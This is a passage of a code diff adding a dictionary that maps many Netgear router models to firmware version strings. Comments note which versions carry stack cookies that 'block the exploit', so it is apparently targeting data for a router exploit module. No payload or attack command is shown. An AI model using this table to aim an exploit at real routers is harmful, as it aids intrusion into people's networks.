"1.0.0.72", + "V1.0.0.42_1.0.42" : "1.0.0.42", + "V1.0.0.30_1.0.30" : "1.0.0.30", + "V1.0.0.24_1.0.24" : "1.0.0.24", + "V1.0.0.16_1.0.16" : "1.0.0.16", + }, + "D6400" : { + "V1.0.0.88_1.0.88" : "1.0.0.88", + "V1.0.0.86_1.0.86" : "1.0.0.86", + "V1.0.0.82_1.0.82" : "1.0.0.82", + "V1.0.0.80_1.0.80" : "1.0.0.80", + "V1.0.0.78_1.0.78" : "1.0.0.78", + "V1.0.0.74_1.0.74" : "1.0.0.74", + "V1.0.0.70_1.0.70" : "1.0.0.70", + "V1.0.0.68_1.0.68" : "1.0.0.68", + "V1.0.0.66_1.0.66" : "1.0.0.66", + "V1.0.0.60_1.0.60" : "1.0.0.60", + "V1.0.0.58_1.0.58" : "1.0.0.58", + "V1.0.0.56_1.0.56" : "1.0.0.56", + "V1.0.0.54_1.0.54" : "1.0.0.54", + "V1.0.0.52_1.0.52" : "1.0.0.52", + "V1.0.0.44_1.0.44" : "1.0.0.44", + "V1.0.0.38_1.1.38" : "1.0.0.38", + "V1.0.0.34_1.3.34" : "1.0.0.34", + "V1.0.0.22_1.0.22" : "1.0.0.22", + }, + "D7000V2" : { + "V1.0.0.56_1.0.1" : "1.0.0.56", + "V1.0.0.53_1.0.2" : "1.0.0.53", + "V1.0.0.52_1.0.1" : "1.0.0.52", + "V1.0.0.51_1.0.1" : "1.0.0.51", + "V1.0.0.47_1.0.1" : "1.0.0.47", + "V1.0.0.45_1.0.1" : "1.0.0.45", + "V1.0.0.44_1.0.1" : "1.0.0.44", + "V1.0.0.40_1.0.1" : "1.0.0.40", + "V1.0.0.38_1.0.1" : "1.0.0.38", + }, + "D8500" : { + # Version 1.0.3.29 has stack cookies which will block the + # exploit. However, Netgear stopped using stack cookies + # after this version. + "V1.0.3.44_1.0.1" : "1.0.3.44", + "V1.0.3.43_1.0.1" : "1.0.3.43", + "V1.0.3.42_1.0.1" : "1.0.3.42", + "V1.0.3.39_1.0.1" : "1.0.3.39", + "V1.0.3.36_1.0.1" : "1.0.3.36", + "V1.0.3.35_1.0.1" : "1.0.3.35", + "V1.0.3.28_1.0.1" : "1.0.3.28", + "V1.0.3.27_1.0.1" : "1.0.3.27", + "V1.0.3.25_1.0.1" : "1.0.3.25", + }, + "DC112A" : { + "V1.0.0.44_1.0.60" : "1.0.0.44", + "V1.0.0.30_1.0.60" : "1.0.0.30", + "V1.0.0.24_1.0.60" : "1.0.0.24", + }, + "DGN2200" : { + "V1.0.0.58_7.0.57" : "1.0.0.58", + "V1.0.0.57_7.0.57" : "1.0.0.57", + "V1.0.0.55_7.0.55" : "1.0.0.55", + "V1.0.0.52_7.0.52" : "1.0.0.52", + "V1.0.0.50_7.0.50NA" : "1.0.0.50NA", + "V1.0.0.36_7.0.36NA" : "1.0.0.36NA", + "V1.0.0.36_7.0.36" : "1.0.0.36", + }, + "DGN2200M" : { + "V1.0.0.37_1.0.21WW" : "1.0.0.37", + "V1.0.0.35_1.0.21WW" : "1.0.0.35", + "V1.0.0.35_1.0.21NA" : "1.0.0.35NA", + "V1.0.0.33_1.0.21WW" : "1.0.0.33", + "V1.0.0.33_1.0.21NA" : "1.0.0.33NA", + "V1.0.0.26_1.0.20WW" : "1.0.0.26", + "V1.0.0.24_1.0.20NA" : "1.0.0.24NA", + }, + "DGN2200V4" : { + "V1.0.0.110_1.0.110" : "1.0.0.110", + "V1.0.0.108_1.0.108" : "1.0.0.108", + "V1.0.0.102_1.0.102" : "1.0.0.102", + "V1.0.0.98_1.0.98" : "1.0.0.98", + "V1.0.0.90_1.0.90" : "1.0.0.90", + "V1.0.0.86_1.0.86" : "1.0.0.86", + "V1.0.0.82_1.0.82" : "1.0.0.82", + "V1.0.0.76_1.0.76" : "1.0.0.76", + "V1.0.0.66_1.0.66" : "1.0.0.66", + "V1.0.0.62_1.0.62" : "1.0.0.62", + "V1.0.0.58_1.0.58" : "1.0.0.58", + "V1.0.0.46_1.0.46" : "1.0.0.46", + "V1.0.0.24_5.0.8" : "1.0.0.24", + "V1.0.0.5_5.0.3" : "1.0.0.5", + }, + "DGND3700" : { + "V1.0.0.17_1.0.17" : "1.0.0.17", + "V1.0.0.17_1.0.17NA" : "1.0.0.17NA", + "V1.0.0.12_1.0.12" : "1.0.0.12", + "V1.0.0.12_1.0.12NA" : "1.0.0.12NA", + }, + "EX3700" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + "V1.0.0.24_1.0.18" : "1.0.0.24", + "V1.0.0.22_1.0.17" : "1.0.0.22", + }, + "EX3800" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + }, + "EX3920" : { + "V1.0.0.78_1.0.51" : "1.0.0.78", + "V1.0.0.76_1.0.49" : "1.0.0.76", + "V1.0.0.72_1.0.47" : "1.0.0.72", + "V1.0.0.70_1.0.46" : "1.0.0.70", + "V1.0.0.68_1.0.45" : "1.0.0.68", + "V1.0.0.64_1.0.43" : "1.0.0.64", + "V1.0.0.62_1.0.42" : "1.0.0.62", + "V1.0.0.58_1.0.38" : "1.0.0.58", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.48_1.0.28" : "1.0.0.48", + "V1.0.0.46_1.0.26" : "1.0.0.46", + "V1.0.0.44_1.0.22" : "1.0.0.44", + "V1.0.0.34_1.0.22" : "1.0.0.34", + "V1.0.0.28_1.0.20" : "1.0.0.28", + "V1.0.0.26_1.0.19" : "1.0.0.26", + }, + "EX6000" : { + "V1.0.0.38_1.0.22" : "1.0.0.38", + "V1.0.0.32_1.0.18" : "1.0.0.32", + "V1.0.0.30_1.0.17" : "1.0.0.30", + "V1.0.0.28_1.0.16" : "1.0.0.28", + "V1.0.0.24_1.0.14" : "1.0.0.24", + "V1.0.0.20_1.0.11" : "1.0.0.20", + "V1.0.0.10_1.0.6" : "1.0.0.10", + }, + "EX6100" : { + "V1.0.2.24_1.1.134" : "1.0.2.24", + "V1.0.2.18_1.1.131" : "1.0.2.18", + "V1.0.2.16_1.1.130" : "1.0.2.16", + "V1.0.2.6_1.1.120" : "1.0.2.6", + "V1.0.1.36_1.0.114" : "1.0.1.36", + "V1.0.0.28_1.0.66" : "1.0.0.28", + "V1.0.0.22_1.0.51" : "1.0.0.22", + }, + "EX6120" : { + "V1.0.0.48_1.0.30" : "1.0.0.48", + "V1.0.0.46_1.0.29" : "1.0.0.46", + "V1.0.0.42_1.0.27" : "1.0.0.42", + "V1.0.0.40_1.0.25" : "1.0.0.40", + "V1.0.0.36_1.0.23" : "1.0.0.36", + "V1.0.0.32_1.0.21" : "1.0.0.32", + "V1.0.0.30_1.0.20" : "1.0.0.30", + "V1.0.0.28_1.0.18" : "1.0.0.28", + "V1.0.0.26_1.0.16" : "1.0.0.26", + "V1.0.0.16_1.0.11" : "1.0.0.16", + "V1.0.0.14_1.0.10" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.4_1.0.2" : "1.0.0.4", + }, + "EX6130" : { + "V1.0.0.30_1.0.17" : "1.0.0.30", + "V1.0.0.28_1.0.16" : "1.0.0.28", + "V1.0.0.24_1.0.14" : "1.0.0.24", + "V1.0.0.22_1.0.13" : "1.0.0.22", + "V1.0.0.20_1.0.12" : "1.0.0.20", + "V1.0.0.16_1.0.10" : "1.0.0.16", + "V1.0.0.12_1.0.7" : "1.0.0.12", + }, + "EX6150" : { + "V1.0.0.42_1.0.73" : "1.0.0.42", + "V1.0.0.34_1.0.69" : "1.0.0.34", + "V1.0.0.32_1.0.68" : "1.0.0.32", + "V1.0.0.28_1.0.64" : "1.0.0.28", + "V1.0.0.16_1.0.58" : "1.0.0.16", + "V1.0.0.14_1.0.54" : "1.0.0.14", + }, + "EX6200" : { + "V1.0.3.90_1.1.125" : "1.0.3.90", + "V1.0.3.88_1.1.123" : "1.0.3.88", + "V1.0.3.82_1.1.117" : "1.0.3.82", + "V1.0.3.76_1.1.111" : "1.0.3.76", + "V1.0.3.74_1.1.109" : "1.0.3.74", + "V1.0.3.68_1.1.104" : "1.0.3.68", + "V1.0.1.60_1.1.98" : "1.0.1.60", + "V1.0.0.52_1.1.90" : "1.0.0.52", + "V1.0.0.46_1.1.70" : "1.0.0.46", + "V1.0.0.42_1.1.57" : "1.0.0.42", + "V1.0.0.38_1.1.52" : "1.0.0.38", + }, + "EX6920" : { + "V1.0.0.40_1.0.25" : "1.0.0.40", + "V1.0.0.36_1.0.23" : "1.0.0.36", + "V1.0.0.32_1.0.21" : "1.0.0.32", + "V1.0.0.30_1.0.20" : "1.0.0.30", + "V1.0.0.28_1.0.18" : "1.0.0.28", + "V1.0.0.26_1.0.16" : "1.0.0.26", + "V1.0.0.16_1.0.11" : "1.0.0.16", + "V1.0.0.14_1.0.10" : "1.0.0.14", + "V1.0.0.8_1.0.4" : "1.0.0.8", + "V1.0.0.4_1.0.2" : "1.0.0.4", + }, + "EX7000" : { + "V1.0.1.84_1.0.148" : "1.0.1.84", + "V1.0.1.80_1.0.144" : "1.0.1.80", + "V1.0.1.78_1.0.140" : "1.0.1.78", + "V1.0.0.66_1.0.126" : "1.0.0.66", + "V1.0.0.62_1.0.122" : "1.0.0.62", + "V1.0.0.58_1.0.112" : "1.0.0.58", + "V1.0.0.56_1.0.108" : "1.0.0.56", + "V1.0.0.50_1.0.102" : "1.0.0.50", + "V1.0.0.42_1.0.94" : "1.0.0.42", + "V1.0.0.38_1.0.91" : "1.0.0.38", + "V1.0.0.36_1.0.88" : "1.0.0.36", + "V1.0.0.32_1.0.84" : "1.0.0.32", + "V1.0.0.30_1.0.72" : "1.0.0.30", + }, + "LG2200D" : { + "V1.0.0.57_1.0.40" : "1.0.0.57", + }, + "MBM621" : { + "V1.1.3" : "1.1.3", + }, + "MBR624GU" : { + "V6.01.30.64WW" : "6.1.30.64", + "V6.01.30.61WW" : "6.1.30.61", + "V6.01.30.59WW" : "6.1.30.59", + "V6.01.30.59NA" : "6.1.30.59NA", + "V6.00.30.46WW" : "6.0.30.46", + "V6.00.28.43WW" : "6.0.28.43", + "V6.00.28.43NA" : "6.0.28.43NA", + "V6.00.26.21WW" : "6.0.26.21", + "V6.00.22.14NA" : "6.0.22.14NA", + "V6.00.22.12" : "6.0.22.12", + }, + "MBR1200" : { + "V1.2.2.53" : "1.2.2.53", + }, + "MBR1515" : { + "V1.2.2.68" : "1.2.2.68", + }, + "MBR1516" : { + "V1.2.2.84BM" : "1.2.2.84BM", + }, + "MBRN3000" : { + "V1.0.0.74_2.0.12WW" : "1.0.0.74", + "V1.0.0.72_2.0.12WW" : "1.0.0.72", + "V1.0.0.72_2.0.12NA" : "1.0.0.72NA", + "V1.0.0.69_2.0.12WW" : "1.0.0.69", + "V1.0.0.69_2.0.12NA" : "1.0.0.69NA", + "V1.0.0.65_2.0.12WW" : "1.0.0.65", + "V1.0.0.65_2.0.12NA" : "1.0.0.65NA", + "V1.0.0.43NA" : "1.0.0.43NA", + }, + "MVBR1210C" : { + "V1.2.0.35BM" : "1.2.0.35", + }, + "R4500" : { + "V1.0.0.4_1.0.3" : "1.0.0.4", + }, + "R6200" : { + "V1.0.1.58_1.0.44" : "1.0.1.58", + "V1.0.1.56_1.0.43" : "1.0.1.56", + "V1.0.1.52_1.0.41" : "1.0.1.52", + "V1.0.1.48_1.0.37" : "1.0.1.48", + "V1.0.1.46_1.0.36" : "1.0.1.46", + "V1.0.0.28_1.0.24" : "1.0.0.28", + "V1.0.0.18_1.0.18" : "1.0.0.18", + }, + "R6200V2" : { + "V1.0.3.12_10.1.11" : "1.0.3.12", + "V1.0.3.10_10.1.10" : "1.0.3.10", + "V1.0.1.20_1.0.18" : "1.0.1.20", + "V1.0.1.18_1.0.17" : "1.0.1.18", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + }, + "R6250" : { + "V1.0.4.38_10.1.30" : "1.0.4.38", + "V1.0.4.36_10.1.30" : "1.0.4.36", + "V1.0.4.34_10.1.28" : "1.0.4.34", + "V1.0.4.26_10.1.23" : "1.0.4.26", + "V1.0.4.20_10.1.20" : "1.0.4.20", + "V1.0.4.16_10.1.18" : "1.0.4.16", + "V1.0.4.14_10.1.17" : "1.0.4.14", + "V1.0.4.12_10.1.15" : "1.0.4.12", + "V1.0.4.8_10.1.13" : "1.0.4.08", + "V1.0.4.6_10.1.12" : "1.0.4.06", + "V1.0.4.2_10.1.10" : "1.0.4.02", + "V1.0.3.12_10.1.8" : "1.0.3.12", + "V1.0.3.6_10.1.3" : "1.0.3.06", + "V1.0.1.84_1.0.78" : "1.0.1.84", + "V1.0.1.82_1.0.77" : "1.0.1.82", + "V1.0.1.80_1.0.75" : "1.0.1.80", + "V1.0.0.72_1.0.71" : "1.0.0.72", + "V1.0.0.70_1.0.70" : "1.0.0.70", + "V1.0.0.62_1.0.62" : "1.0.0.62", + }, + "R6300" : { + "V1.0.2.80_1.0.59" : "1.0.2.80", + "V1.0.2.78_1.0.58" : "1.0.2.78", + "V1.0.2.76_1.0.57" : "1.0.2.76", + "V1.0.2.70_1.0.50" : "1.0.2.70", + "V1.0.2.68_1.0.49" : "1.0.2.68", + "V1.0.2.38_1.0.33" : "1.0.2.38", + "V1.0.2.36_1.0.28" : "1.0.2.36", + "V1.0.2.26_1.0.26" : "1.0.2.26", + "V1.0.2.14_1.0.23" : "1.0.2.14", + "V1.0.2.10_1.0.21" : "1.0.2.10", + "V1.0.0.90_1.0.18" : "1.0.0.90", + "V1.0.0.68_1.0.16" : "1.0.0.68", + }, + "R6300V2" : { + # Versions 1.0.4.12, 1.0.4.18, and 1.0.4.20 all have stack + # cookies which will block the exploit. However, Netgear + # stopped using stack cookies again in version 1.0.4.24 + "V1.0.4.36_10.0.93" : "1.0.4.36", + "V1.0.4.34_10.0.92" : "1.0.4.34", + "V1.0.4.32_10.0.91" : "1.0.4.32", + "V1.0.4.28_10.0.89" : "1.0.4.28", + "V1.0.4.24_10.0.87" : "1.0.4.24", + "V1.0.4.8_10.0.77" : "1.0.4.8", + "V1.0.4.6_10.0.76" : "1.0.4.6", + "V1.0.4.2_10.0.74" : "1.0.4.2", + "V1.0.3.30_10.0.73" : "1.0.3.30", + "V1.0.3.28_10.0.71" : "1.0.3.28", + "V1.0.3.26_10.0.70" : "1.0.3.26", + "V1.0.3.22_10.0.67" : "1.0.3.22", + "V1.0.3.8_1.0.60" : "1.0.3.8", + "V1.0.3.6_1.0.63CH" : "1.0.3.6CH", + "V1.0.3.2_1.0.57" : "1.0.3.2", + "V1.0.2.86_1.0.51" : "1.0.2.86", + "V1.0.2.72_1.0.46" : "1.0.2.72", + "V1.0.1.72_1.0.21" : "1.0.1.72", + }, + "R6400" : { + "V1.0.1.52_1.0.36" : "1.0.1.52", + "V1.0.1.50_1.0.35" : "1.0.1.50", + "V1.0.1.46_1.0.32" : "1.0.1.46", + "V1.0.1.44_1.0.31" : "1.0.1.44", + "V1.0.1.42_1.0.28" : "1.0.1.42", + "V1.0.1.36_1.0.25" : "1.0.1.36", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.26_1.0.19" : "1.0.1.26", + "V1.0.1.24_1.0.18" : "1.0.1.24", + "V1.0.1.22_1.0.17" : "1.0.1.22", + "V1.0.1.20_1.0.16" : "1.0.1.20", + "V1.0.1.18_1.0.15" : "1.0.1.18", + "V1.0.1.12_1.0.11" : "1.0.1.12", + "V1.0.1.6_1.0.4" : "1.0.1.6", + "V1.0.0.26_1.0.14" : "1.0.0.26", + "V1.0.0.24_1.0.13" : "1.0.0.24", + "V1.0.0.20_1.0.11" : "1.0.0.20", + "V1.0.0.14_1.0.8" : "1.0.0.14", + }, + "R6400V2" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + "V1.0.2.50_1.0.38" : "1.0.2.50", + "V1.0.2.46_1.0.36" : "1.0.2.46", + "V1.0.2.44_1.0.35" : "1.0.2.44", + "V1.0.2.34_1.0.22" : "1.0.2.34", + "V1.0.2.32_1.0.20" : "1.0.2.32", + "V1.0.2.14_1.0.7" : "1.0.2.14", + }, + "R6700" : { + "V1.0.2.8_10.0.53" : "1.0.2.8", + "V1.0.2.6_10.0.52" : "1.0.2.6", + "V1.0.1.48_10.0.46" : "1.0.1.48", + "V1.0.1.46_10.0.45" : "1.0.1.46", + "V1.0.1.44_10.0.44" : "1.0.1.44", + "V1.0.1.36_10.0.40" : "1.0.1.36", + "V1.0.1.32_10.0.38" : "1.0.1.32", + "V1.0.1.26_10.0.35" : "1.0.1.26", + "V1.0.1.22_10.0.33" : "1.0.1.22", + "V1.0.1.20_10.0.32" : "1.0.1.20", + "V1.0.1.16_10.0.30" : "1.0.1.16", + "V1.0.1.14_10.0.29" : "1.0.1.14", + "V1.0.0.26_10.0.26" : "1.0.0.26", + "V1.0.0.24_10.0.18" : "1.0.0.24", + "V1.0.0.2_1.0.1" : "1.0.0.2", + }, + "R6700V3" : { + "V1.0.4.84_10.0.58" : "1.0.4.84", + "V1.0.4.82_10.0.57" : "1.0.4.82", + "V1.0.4.78_10.0.55" : "1.0.4.78", + "V1.0.3.66_10.0.50" : "1.0.3.66", + "V1.0.2.66_10.0.48" : "1.0.2.66", + "V1.0.2.62_10.0.46" : "1.0.2.62", + "V1.0.2.60_10.0.44" : "1.0.2.60", + "V1.0.2.56_10.0.42" : "1.0.2.56", + "V1.0.2.52_1.0.39" : "1.0.2.52", + }, + "R6900" : { + "V1.0.2.8_10.0.38" : "1.0.2.8", + "V1.0.2.6_10.0.37" : "1.0.2.6", + "V1.0.2.4_10.0.35" : "1.0.2.4", + "V1.0.1.48_10.0.30" : "1.0.1.48", + "V1.0.1.46_10.0.29" : "1.0.1.46", + "V1.0.1.44_10.0.28" : "1.0.1.44", + "V1.0.1.34_1.0.24" : "1.0.1.34", + "V1.0.1.28_1.0.21" : "1.0.1.28", + "V1.0.1.26_1.0.20" : "1.0.1.26", + "V1.0.1.22_1.0.18" : "1.0.1.22", + "V1.0.1.20_1.0.17" : "1.0.1.20", + "V1.0.1.16_1.0.15" : "1.0.1.16", + "V1.0.1.14_1.0.14" : "1.0.1.14", + "V1.0.0.4_1.0.10" : "1.0.0.4", + "V1.0.0.2_1.0.2" : "1.0.0.2", + }, + "R6900P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.46_1.0.30" : "1.0.0.46", + }, + "R7000" : { + "V1.0.0.96_1.0.15" : "0.96", + "V1.0.1.22_1.0.15" : "1.22", + "V1.0.2.164_1.0.15" : "2.16", + "V1.0.2.194_1.0.15" : "2.19", + "V1.0.3.24_1.1.20" : "3.24", + "V1.0.3.56_1.1.25" : "3.56", + "V1.0.3.60_1.1.27" : "3.60", + "V1.0.3.68_1.1.31" : "3.68", + "V1.0.3.80_1.1.38" : "3.80", + "V1.0.4.18_1.1.52" : "4.18", + "V1.0.4.28_1.1.64" : "4.28", + "V1.0.4.30_1.1.67" : "4.30", + "V1.0.5.64_1.1.88" : "5.64", + "V1.0.5.70_1.1.91" : "5.70", + "V1.0.7.2_1.1.93" : "7.2", + "V1.0.7.6_1.1.99" : "7.6", + "V1.0.7.10_1.2.3" : "7.10", + "V1.0.7.12_1.2.5" : "7.12", + "V1.0.8.34_1.2.15" : "8.34", + "V1.0.9.6_1.2.19" : "9.6", + "V1.0.9.10_1.2.21" : "9.10", + "V1.0.9.12_1.2.23" : "9.12", + "V1.0.9.14_1.2.25" : "9.14", + "V1.0.9.18_1.2.27" : "9.18", + "V1.0.9.26_10.2.31" : "9.26", + "V1.0.9.28_10.2.32" : "9.28", + "V1.0.9.32_10.2.34" : "9.32", + "V1.0.9.34_10.2.36" : "9.34", + "V1.0.9.42_10.2.44" : "9.42", + "V1.0.9.60_10.2.60" : "9.60", + "V1.0.9.64_10.2.64" : "9.64", + "V1.0.9.88_10.2.88" : "9.88", + "V1.0.11.100_10.2.100" : "11.100", + }, + "R7000P" : { + "V1.3.1.64_10.1.36" : "1.3.1.64", + "V1.3.1.44_10.1.23" : "1.3.1.44", + "V1.3.1.26_10.1.3" : "1.3.1.26", + "V1.3.0.20_10.1.1" : "1.3.0.20", + "V1.3.0.8_1.0.93" : "1.3.0.8", + "V1.2.0.22_1.0.78" : "1.2.0.22", + "V1.0.1.14_1.0.59" : "1.0.1.14", + "V1.0.0.58_1.0.50" : "1.0.0.58", + "V1.0.0.56_1.0.45" : "1.0.0.56", + "V1.0.0.50_1.0.35" : "1.0.0.50", + "V1.0.0.46_1.0.30" : "1.0.0.46", + "V1.0.0.44_1.0.27" : "1.0.0.44", + }, + "R7100LG" : { + "V1.0.0.52_1.0.6" : "1.0.0.52", + "V1.0.0.50_1.0.6" : "1.0.0.50", + "V1.0.0.48_1.0.6" : "1.0.0.48", + "V1.0.0.46_1.0.6" : "1.0.0.46", + "V1.0.0.42_1.0.6" : "1.0.0.42", + "V1.0.0.40_1.0.6" : "1.0.0.40", + "V1.0.0.38_1.0.6" : "1.0.0.38", + "V1.0.0.36_1.0.6" : "1.0.0.36", + "V1.0.0.34_1.0.6" : "1.0.0.34", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.30_1.0.6" : "1.0.0.30", + "V1.0.0.28_1.0.6" : "1.0.0.28", + "V1.0.0.24_1.0.6" : "1.0.0.24", + }, + "R7300" : { + "V1.0.0.74_1.0.29" : "1.0.0.74", + "V1.0.0.70_1.0.25" : "1.0.0.70", + "V1.0.0.68_1.0.24" : "1.0.0.68", + "V1.0.0.62_1.0.21" : "1.0.0.62", + "V1.0.0.60_1.0.20" : "1.0.0.60", + "V1.0.0.56_1.0.18" : "1.0.0.56", + "V1.0.0.54_1.0.17" : "1.0.0.54", + "V1.0.0.52_1.0.16" : "1.0.0.52", + "V1.0.0.46_1.0.13" : "1.0.0.46", + "V1.0.0.44_1.0.12" : "1.0.0.44", + "V1.0.0.32_1.0.6" : "1.0.0.32", + "V1.0.0.26_1.0.6" : "1.0.0.26", + }, + "R7850" : { + "V1.0.5.48_10.0.42" : "1.0.5.48", + "V1.0.4.46_10.0.22" : "1.0.4.46", + "V1.0.4.42_10.0.12" : "1.0.4.42", + }, + "R7900" : { + "V1.0.4.22_10.0.44" : "1.0.4.22", + "V1.0.3.18_10.0.42" : "1.0.3.18", + "V1.0.3.10_10.0.38" : "1.0.3.10", + "V1.0.3.8_10.0.37" : "1.0.3.8", + "V1.0.2.16_10.0.32" : "1.0.2.16", + "V1.0.2.10_10.0.29" : "1.0.2.10", + "V1.0.1.26_10.0.23" : "1.0.1.26", + "V1.0.1.18_10.0.20" : "1.0.1.18", + "V1.0.1.12_10.0.17" : "1.0.1.12", + "V1.0.1.8_10.0.14" : "1.0.1.8", + "V1.0.1.4_10.0.12" : "1.0.1.4", + "V1.0.0.10_10.0.7" : "1.0.0.10", + "V1.0.0.8_10.0.5" : "1.0.0.8", + "V1.0.0.6_10.0.4" : "1.0.0.6", + "V1.0.0.2_10.0.1" : "1.0.0.2", + }, + "R8000" : { + "V1.0.4.46_10.1.63" : "1.0.4.46", + "V1.0.4.28_10.1.54" : "1.0.4.28", + "V1.0.4.18_10.1.49" : "1.0.4.18", + "V1.0.4.12_10.1.46" : "1.0.4.12", + "V1.0.4.4_1.1.42" : "1.0.4.4", + "V1.0.4.2_1.1.41" : "1.0.4.2", + "V1.0.3.54_1.1.37" : "1.0.3.54", + "V1.0.3.48_1.1.33" : "1.0.3.48", + "V1.0.3.46_1.1.32" : "1.0.3.46", + "V1.0.3.36_1.1.25" : "1.0.3.36", + "V1.0.3.32_1.1.21" : "1.0.3.32", + "V1.0.3.26_1.1.18" : "1.0.3.26", + "V1.0.3.4_1.1.2" : "1.0.3.4", + "V1.0.2.46_1.0.97" : "1.0.2.46", + "V1.0.2.44_1.0.96" : "1.0.2.44", + "V1.0.1.16_1.0.74" : "1.0.1.16", + "V1.0.0.110_1.0.70" : "1.0.0.110", + "V1.0.0.108_1.0.62" : "1.0.0.108", + "V1.0.0.102_1.0.45" : "1.0.0.102", + "V1.0.0.100_1.0.44" : "1.0.0.100", + "V1.0.0.90_1.0.39" : "1.0.0.90", + "V1.0.0.76_1.0.32" : "1.0.0.76", + "V1.0.0.74_1.0.31" : "1.0.0.74", + "V1.0.0.68_1.0.27" : "1.0.0.68", + "V1.0.0.46_1.0.17" : "1.0.0.46", + }, + "R8300" : { + # These version strings may be slightly off. Versions 1.0.2.128 and 1.0.2.130 only used + # the short versions, rather than the full version string like other models. + "V1.0.2.130" : "1.0.2.130", + "V1.0.2.128" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.48_1.0.52" : "1.0.2.48", + }, + "R8500" : { + "V1.0.2.130_1.0.99" : "1.0.2.130", + "V1.0.2.128_1.0.97" : "1.0.2.128", + "V1.0.2.122_1.0.94" : "1.0.2.122", + "V1.0.2.116_1.0.90" : "1.0.2.116", + "V1.0.2.106_1.0.85" : "1.0.2.106", + "V1.0.2.100_1.0.82" : "1.0.2.100", + "V1.0.2.94_1.0.79" : "1.0.2.94", + "V1.0.2.86_1.0.75" : "1.0.2.86", + "V1.0.2.80_1.0.71" : "1.0.2.80", + "V1.0.2.64_1.0.62" : "1.0.2.64", + "V1.0.2.54_1.0.56" : "1.0.2.54", + "V1.0.2.30_1.0.43" : "1.0.2.30", + "V1.0.2.26_1.0.41" : "1.0.2.26", + "V1.0.0.56_1.0.28" : "1.0.0.56", + "V1.0.0.52_1.0.26" : "1.0.0.52", + "V1.0.0.42_1.0.23" : "1.0.0.42", + "V1.0.0.28_1.0.15" : "1.0.0.28", + }, + "RS400" : { + "V1.5.0.34_10.0.33" : "1.5.0.34", + }, + "WGR614V8" : { + "V1.2.10_21.0.52" : "1.2.10", + "V1.2.10_21.0.52NA" : "1.2.10NA", + "V1.1.24_14.0.43" : "1.1.24", + "V1.1.24_14.0.43NA" : "1.1.24NA", + "V1.1.2_1.0.23" : "1.1.2", + "V1.1.2_1.0.23NA" : "1.1.2NA", + "V1.1.11_6.0.36" : "1.1.11", + "V1.1.11_6.0.36NA" : "1.1.11NA", + "V1.1.1_1.0.20NA" : "1.1.1NA", + "V1.1.20_7.0.37" : "1.1.20", + "V1.1.20_7.0.37NA" : "1.1.20NA", + }, + "WGR614V9" : { + "V1.2.32_43.0.46" : "1.2.32", + "V1.2.32_43.0.46NA" : "1.2.32NA", + "V1.2.30_41.0.44" : "1.2.30", + "V1.2.30_41.0.44NA" : "1.2.30NA", + "V1.2.24_37.0.35" : "1.2.24", + "V1.2.24_37.0.35NA" : "1.2.24NA", + "V1.2.6_18.0.17" : "1.2.6", + "V1.2.6_18.0.17NA" : "1.2.6NA", + "V1.2.2_14.0.13" : "1.2.2", + "V1.2.2_14.0.13NA" : "1.2.2NA", + "V1.0.18_8.0.9PT" : "1.0.18", + "V1.0.18_8.0.9NA" : "1.0.18NA", + "V1.0.15_4.0.3" : "1.0.15", + "V1.0.15_4.0.3NA" : "1.0.15NA", + "V1.0.9_1.0.1NA" : "1.0.9NA", + }, + "WGR614V10" : { + "V1.0.2.66_60.0.90" : "1.0.2.66", + 